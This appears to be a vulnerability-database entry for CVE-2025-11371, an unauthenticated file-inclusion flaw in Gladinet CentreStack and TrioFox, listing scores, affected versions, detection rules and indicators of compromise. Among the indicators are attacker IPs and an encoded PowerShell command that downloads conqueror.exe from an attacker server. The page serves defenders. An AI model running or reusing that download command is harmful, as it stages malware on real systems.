cbcvebase.
CVE-2025-11371
published 2025-10-09

CVE-2025-11371: In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended…

PriorityP191high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2025-11-25
Exploited in the wild
EPSS
92.09%
99.8th percentile
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560

Affected

3 ranges
VendorProductVersion rangeFixed in
gladinetcentrestack< 16.10.10408.5668316.10.10408.56683
gladinetcentrestack_and_triofox<= 16.7.10368.56560
gladinettriofox<= 16.7.10368.56560

Detection & IOCsextracted from sources · hover to see the quote

commandipconfig /all > "C:\programdata\CentreStac_log.txt"
ip147.124.216.205
ip185.196.11.207
urlhttp://185.196.11.207:8000/conqueror.exe
pathC:\Users\Public\conqueror.exe
hashe9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5
ip146.70.134.50
command"C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=
filenameconqueror.exe
  • Monitor IIS/w3wp.exe for child process execution of cmd.exe or PowerShell, which indicates post-exploitation via ViewState deserialization following LFI of web.config
  • Alert on Windows Application Event ID 1316 which captures ViewState deserialization attack payloads in the application event log
  • Detect HTTP referrer from FOFA (https://en.fofa.info/) in web server logs preceding exploitation requests against Gladinet endpoints
  • Monitor for creation or access of C:\programdata\CentreStac_log.txt, used by attackers to exfiltrate command output via the LFI endpoint
  • Alert on creation or execution of conqueror.exe in C:\Users\Public\ as a dropped payload indicator
  • Detect requests to /storage/filesvr.dn with a 't' parameter containing a timestamp set to year 9999, indicating a crafted never-expiring access ticket exploiting the hardcoded AES key vulnerability
  • ·The LFI vulnerability (CVE-2025-11371) is exploitable only when the TempDownload handler (t.dn) is enabled in the UploadDownloadProxy Web.config. Disabling this handler mitigates the vulnerability until patching.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
cisa7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.